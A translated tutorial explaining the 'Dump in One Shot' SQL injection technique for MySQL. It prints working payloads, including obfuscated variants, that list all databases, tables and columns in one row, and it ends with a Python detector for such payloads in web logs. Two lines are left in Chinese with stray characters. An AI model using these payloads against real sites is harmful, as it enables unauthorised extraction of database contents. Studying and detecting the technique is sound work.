Dump in One Shot

Edit by Qsaka
If anything here is wrong, corrections from the experts are welcome. Please go easy on me :)


This article introduces the SQL injection technique known as Dump in One Shot (DIOS).

Example

Let's start with an example.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata) where 
(@a) in (@a:=concat(@a,schema_name,'<br>'))))a)  

The SQL statement above returns the names of every database in a single result row:

+-------------------------------------------------------------------------------------+
| (@a)                                                                                |
+-------------------------------------------------------------------------------------+
|  information_schema<br>mysql<br>performance_schema<br>t3st<br>test<br>yii2basic<br> |
+-------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

Think carefully about how this statement executes before reading the analysis below.

How it works

Let's start from the innermost expression and work outward.

 (@a:=concat(@a,schema_name,'<br>'))  

First, @a is a user-defined variable. concat() concatenates @a, schema_name and '<br>' into one string, and := is the assignment operator. One thing to keep in mind: if any argument to concat() is NULL, the whole result is NULL.

mysql> select @a;
+------+
| @a   |
+------+
| NULL |
+------+
1 row in set (0.00 sec)    
mysql> select (@a:=concat(@a,schema_name,'<br>')) from information_schema.schemata;
+-------------------------------------+
| (@a:=concat(@a,schema_name,'<br>')) |
+-------------------------------------+
| NULL                                |
| NULL                                |
| NULL                                |
| NULL                                |
| NULL                                |
| NULL                                |
+-------------------------------------+
6 rows in set (0.00 sec)

所以執(zhí)行時(shí)先要對(duì)@a進(jìn)行賦值。這也就是本文例子中為什么要select(@a:=0x00)的原因。

mysql> set @a:=0x00;
Query OK, 0 rows affected (0.00 sec)

mysql> select (@a:=concat(@a,schema_name,'<br>')) from information_schema.schemata;
+-------------------------------------------------------------------------------------+
| (@a:=concat(@a,schema_name,'<br>'))                                                 |
+-------------------------------------------------------------------------------------+
|  information_schema<br>                                                             |
|  information_schema<br>mysql<br>                                                    |
|  information_schema<br>mysql<br>performance_schema<br>                              |
|  information_schema<br>mysql<br>performance_schema<br>t3st<br>                      |
|  information_schema<br>mysql<br>performance_schema<br>t3st<br>test<br>              |
|  information_schema<br>mysql<br>performance_schema<br>t3st<br>test<br>yii2basic<br> |
+-------------------------------------------------------------------------------------+
6 rows in set (0.00 sec)

Now look at the statement that wraps this concat() clause:

select (@a) from (information_schema.schemata) where (@a)in (@a:=concat(@a,schema_name,'<br>'))  

This is a SQL where ... in statement. But think about it carefully: isn't it a little different from a normal where ... in? @a is not a column name, and what follows in is not a set of candidate values either.
Well, if you get stuck on that point, you've already lost (′?`*).

mysql> (select (@a) from (select(@a:=0x00),(select ('hahaha') from (information_schema.schemata) where ('biubiubiu') in (@a:=concat(@a,schema_name,'<br>'))))a);
+-------------------------------------------------------------------------------------+
| (@a)                                                                                |
+-------------------------------------------------------------------------------------+
|  information_schema<br>mysql<br>performance_schema<br>t3st<br>test<br>yii2basic<br> |
+-------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

It returns all the database names just the same. Feels like magic, doesn't it ( ̄▽ ̄)". In fact, the subquery (select(@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in (@a:=concat(@a,schema_name,'<br>')))) does nothing but append each schema_name value to the variable @a; it does not return a useful result set. The where condition is evaluated once for every row of information_schema.schemata, so the assignment runs once per row as a side effect whether or not the comparison ever matches. In the end we read all the database names out of the variable @a:

mysql> (select(@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in (@a:=concat(@a,schema_name,'<br>'))));
+------------+----------------------------------------------------------------------------------------------------+
| (@a:=0x00) | (select (@a) from (information_schema.schemata) where (@a) in (@a:=concat(@a,schema_name,'<br>'))) |
+------------+----------------------------------------------------------------------------------------------------+
|            | NULL                                                                                               |
+------------+----------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select @a;
+-------------------------------------------------------------------------------------+
| @a                                                                                  |
+-------------------------------------------------------------------------------------+
|  information_schema<br>mysql<br>performance_schema<br>t3st<br>test<br>yii2basic<br> |
+-------------------------------------------------------------------------------------+
1 row in set (0.00 sec)  

Retrieve all table names

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables) where (@a)in (@a:=concat(@a,table_name,'<br>'))))a);  

Retrieve the tables outside information_schema

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables) where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_name,'<br>'))))a)  

Retrieve the mapping between databases and tables

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables) where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,0x3a,table_name,'<br>'))))a)  

Return all of the database structure (schema > table > column) at once

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns) where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

進(jìn)行模糊匹配查詢

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and table_name like 'SHOP%' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

More DIOS variants

(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)  

(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))  

(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))  

(select 1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@))  
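From the defender's side, the mechanism analysed above (a user variable seeded with 0x00 and then re-assigned inside concat(), export_set() or make_set() while a query walks information_schema) is a distinctive shape that can be flagged in web server logs. The following Python is an added example, not code from the original post; the request lines are constructed samples, and the hex decoding makes the separators used by the obfuscated variants (0x3c62723e is '<br>') visible to the analyst.

```python
# Added example, not from the original post: flag DIOS-style payloads in web logs.
# The shape is a user variable seeded (@a:=0x00) and then re-assigned inside
# concat()/export_set()/make_set() while a query walks information_schema rows.
import re
from urllib.parse import unquote_plus

USER_VAR_ASSIGN = re.compile(r"@\w*\s*:=", re.I)
ACCUMULATOR = re.compile(r"@\w*\s*:=\s*(concat|export_set|make_set)\s*\(", re.I)
INFO_SCHEMA = re.compile(r"information_schema\s*\.\s*(schemata|tables|columns)", re.I)
HEX_LITERAL = re.compile(r"0x[0-9a-f]+", re.I)

def decode_hex_literals(text):
    """Turn MySQL hex string literals (0x3c62723e) into ASCII ('<br>');
    non-printable bytes such as the 0x00 seed are left as written."""
    def repl(match):
        digits = match.group(0)[2:]
        if len(digits) % 2:
            digits = "0" + digits
        decoded = bytes.fromhex(digits)
        if decoded and all(32 <= b < 127 for b in decoded):
            return decoded.decode("ascii")
        return match.group(0)
    return HEX_LITERAL.sub(repl, text)

def dios_indicators(raw_request):
    """Return the DIOS indicators present in one URL-encoded request line."""
    query = decode_hex_literals(unquote_plus(raw_request))
    found = []
    if ACCUMULATOR.search(query):
        found.append("user variable re-assigned inside concat/export_set/make_set")
    if INFO_SCHEMA.search(query):
        found.append("information_schema metadata table referenced")
    if len(USER_VAR_ASSIGN.findall(query)) >= 2:
        found.append("variable seeded and then accumulated (two or more := assignments)")
    return found

def is_dios(raw_request):
    """One indicator alone is weak (concat() is common in legitimate SQL); require two."""
    return len(dios_indicators(raw_request)) >= 2

# Constructed sample access-log request lines, not captured from any real system.
SAMPLE_REQUESTS = [
    "GET /item.php?id=1 HTTP/1.1",
    "GET /item.php?id=1%20union%20select%201,(select(@a)from(select(@a:=0x00),"
    "(select(@a)from(information_schema.schemata)where(@a)in(@a:=concat(@a,schema_name,0x3c62723e))))a) HTTP/1.1",
    "GET /search.php?q=concat%28first%2C%20last%29 HTTP/1.1",
]
```

Run dios_indicators() over each line of an access log; the third sample shows that a legitimate concat() in a query string is not flagged on its own.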

References

DIOS (Dump in One Shot) Explained
DIOS (Dump in One Shot) Explained Part 2
DIOS the SQL Injectors Weapon (Upgraded)
